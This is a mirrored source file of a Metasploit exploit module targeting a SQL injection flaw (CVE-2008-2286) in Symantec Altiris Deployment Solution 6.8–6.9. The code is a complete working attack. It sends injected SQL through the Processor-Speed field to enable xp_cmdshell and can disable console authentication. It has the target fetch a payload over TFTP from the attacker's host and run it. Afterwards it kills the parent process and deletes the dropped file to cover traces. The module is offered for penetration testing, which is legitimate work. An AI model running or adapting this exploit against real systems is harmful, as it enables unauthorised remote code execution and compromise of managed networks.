Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/misc/altiris_ds_sqli.rb
19612 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Exploit::Remote
7
Rank = NormalRanking
8
9
include Msf::Exploit::CmdStager
10
include Msf::Exploit::Remote::Tcp
11
12
def initialize(info = {})
13
super(
14
update_info(
15
info,
16
'Name' => 'Symantec Altiris DS SQL Injection',
17
'Description' => %q{
18
This module exploits a SQL injection flaw in Symantec Altiris Deployment Solution 6.8
19
to 6.9.164. The vulnerability exists on axengine.exe which fails to adequately sanitize
20
numeric input fields in "UpdateComputer" notification Requests. In order to spawn a shell,
21
several SQL injections are required in close succession, first to enable xp_cmdshell, then
22
retrieve the payload via TFTP and finally execute it. The module also has the capability
23
to disable or enable local application authentication. In order to work the target system
24
must have a tftp client available.
25
},
26
'Author' => [
27
'Brett Moore', # Vulnerability discovery
28
'3v0lver' # Metasploit module
29
],
30
'License' => MSF_LICENSE,
31
'References' => [
32
[ 'CVE', '2008-2286' ],
33
[ 'OSVDB', '45313' ],
34
[ 'BID', '29198'],
35
[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-08-024' ]
36
],
37
'DefaultOptions' => {
38
'EXITFUNC' => 'process',
39
},
40
'Targets' => [
41
[
42
'Windows 2003 (with tftp client available)',
43
{
44
'Arch' => ARCH_X86,
45
'Platform' => 'win'
46
}
47
]
48
],
49
'Privileged' => true,
50
'Platform' => 'win',
51
'DisclosureDate' => '2008-05-15',
52
'DefaultTarget' => 0,
53
'Compat' => {
54
'Meterpreter' => {
55
'Commands' => %w[
56
stdapi_fs_delete_file
57
stdapi_sys_config_getenv
58
stdapi_sys_process_attach
59
stdapi_sys_process_get_processes
60
stdapi_sys_process_kill
61
]
62
}
63
},
64
'Notes' => {
65
'Reliability' => UNKNOWN_RELIABILITY,
66
'Stability' => UNKNOWN_STABILITY,
67
'SideEffects' => UNKNOWN_SIDE_EFFECTS
68
}
69
)
70
)
71
72
register_options(
73
[
74
Opt::RPORT(402),
75
OptBool.new('XP_CMDSHELL', [ true, "Enable xp_cmdshell prior to exploit", true]),
76
OptBool.new('DISABLE_SECURITY', [ true, "Exploit SQLi to execute wc_upd_disable_security and disable Console Authentication", false ]),
77
OptBool.new('ENABLE_SECURITY', [ true, "Enable Local Deployment Console Authentication", false ])
78
]
79
)
80
deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')
81
82
self.needs_cleanup = true
83
end
84
85
def execute_command(cmd, opts = {})
86
inject = []
87
88
if @xp_shell_enable
89
inject += [
90
"#{Rex::Text.to_hex("sp_configure \"show advanced options\", 1; reconfigure", '')}",
91
"#{Rex::Text.to_hex("sp_configure \"xp_cmdshell\", 1; reconfigure", '')}",
92
]
93
@xp_shell_enable = false
94
end
95
96
if @wc_disable_security
97
inject += ["#{Rex::Text.to_hex("wc_upd_disable_security", '')}"]
98
@wc_disable_security = false
99
end
100
101
if @wc_enable_security
102
inject += ["#{Rex::Text.to_hex("wc_upd_enable_security", '')}"]
103
@wc_enable_security = false
104
end
105
106
inject += ["#{Rex::Text.to_hex("master.dbo.xp_cmdshell \'cd %TEMP% && cmd.exe /c #{cmd}\'", '')}"] if cmd != nil
107
108
inject.each do |sqli|
109
send_update_computer("2659, null, null;declare @querya VARCHAR(255);select @querya = 0x#{sqli};exec(@querya);--")
110
end
111
end
112
113
def send_update_computer(processor_speed)
114
notification = %Q|Request=UpdateComputer
115
OS-Bit=32
116
CPU-Arch=x86
117
IP-Address=192.168.20.107
118
MAC-Address=005056C000AB
119
Name=Remove_test
120
OS=Windows XP
121
Version=2.6-38 (32-Bit)
122
LoggedIn=Yes
123
Boot-Env=Automation
124
Platform=Linux
125
Agent-Settings=Same
126
Sys-Info-TimeZoneBias=0
127
Processor=Genuine Intel Intel(R) Core(TM) i7 CPU M 620 @ 2.67GHz
128
Processor-Speed=#{processor_speed}
129
\x00
130
|
131
132
connect
133
sock.put(notification)
134
response = sock.get_once()
135
disconnect
136
137
return response
138
end
139
140
def check
141
res = send_update_computer("2659")
142
143
unless res and res =~ /Result=Success/ and res =~ /DSVersion=(.*)/
144
return Exploit::CheckCode::Unknown
145
end
146
147
version = $1
148
149
unless version =~ /^6\.(\d+)\.(\d+)$/
150
return Exploit::CheckCode::Safe
151
end
152
153
vprint_status "#{rhost}:#{rport} - Altiris DS Version '#{version}'"
154
155
minor = $1.to_i
156
build = $2.to_i
157
158
if minor == 8
159
if build == 206 || build == 282 || build == 378
160
return Exploit::CheckCode::Appears
161
elsif build < 390
162
return Exploit::CheckCode::Appears
163
end
164
elsif minor == 9 and build < 176
165
# The existence of versions matching this profile is a possibility... none were observed in the wild though
166
# as such, we're basing confidence off of Symantec's vulnerability bulletin.
167
return Exploit::CheckCode::Appears
168
end
169
170
return Exploit::CheckCode::Safe
171
end
172
173
def exploit
174
@wc_disable_security = datastore['DISABLE_SECURITY']
175
@wc_enable_security = datastore['ENABLE_SECURITY']
176
@xp_shell_enable = datastore['XP_CMDSHELL']
177
178
# CmdStagerVBS was tested here as well, however delivery took roughly
179
# 30 minutes and required sending almost 350 notification messages.
180
# size constraint requirement for SQLi is: linemax => 393
181
tftphost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
182
execute_cmdstager({ delay: 1.5, tftphost: tftphost, temp: '%TEMP%\\', flavor: :tftp })
183
end
184
185
def on_new_session(client)
186
return if not stager_instance.payload_exe
187
188
# can't scrub dropped payload while the process is still active so...
189
# iterate through process list, find our process and the associated
190
# parent process ID, Kill the parent.
191
# This module doesn't use FileDropper because of timing issues when
192
# using migrate -f and FileDropper. On the other hand PrependMigrate
193
# has been avoided because of older issues with reverse_https payload
194
195
unless client.type == "meterpreter"
196
print_error("Automatic cleanup only available with meterpreter, please delete #{stager_instance.payload_exe} manually")
197
return
198
end
199
200
client.core.use("stdapi") unless client.ext.aliases.include?("stdapi")
201
# migrate
202
print_status("Migrating ...")
203
client.console.run_single("run migrate -f")
204
# kill the parent process so the payload can hopefully be dropped
205
print_status("Kill parent process ...")
206
client.sys.process.get_processes().each do |proc|
207
if proc['pid'] == client.sys.process.open.pid
208
client.sys.process.kill(proc['ppid'])
209
end
210
end
211
212
win_temp = client.sys.config.getenv('TEMP')
213
win_file = "#{win_temp}\\#{stager_instance.payload_exe}"
214
print_status("Attempting to delete #{win_file} ...")
215
client.shell_command_token(%Q|attrib.exe -r #{win_file}|)
216
client.fs.file.rm(win_file)
217
print_good("Deleted #{win_file}")
218
end
219
end
220
221